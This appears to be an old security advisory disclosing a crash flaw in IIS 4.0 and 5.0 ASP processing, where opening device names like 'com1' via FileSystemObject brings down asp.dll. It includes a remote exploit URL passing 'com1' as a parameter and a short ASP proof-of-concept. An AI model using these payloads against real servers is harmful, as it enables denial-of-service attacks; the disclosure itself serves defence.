|
Release Date:
July 5, 2001
Severity:
High
Systems Affected:
Microsoft Windows NT 4.0 Internet Information Services 4.0
Microsoft Windows 2000 Internet Information Services 5.0
Description:
Openning and reading of device files (com1, com2, etc.) using Scripting.FileSystemObject
will crash ASP-processor (asp.dll).
Example:
1. Local exploit:
If you have permission on creating .asp-file, you can crash ASP-processor.
2. Remote exploit:
Sometimes filename passing as asp-script param, which open and read
data from file. Passing param as device file will
crash asp-processor.
http://host.int/scripts/script.asp?script=com1
3. ASP-Exploit:
<%
Dim strFileName, objFSO, objFile
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
strFileName = "com1"
Set objFile = objFSO.OpenTextFile(strFileName)
Response.Write objFile.ReadAll
objFile.Close
%>
Solution
Fix Scripting.FileSystemObject (have to check file for existing
before openning.
Vendor Status:
Disclaimer
The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out
of or in connection with the use or spread of this information.
Any use of this information is at the user's own risk.
|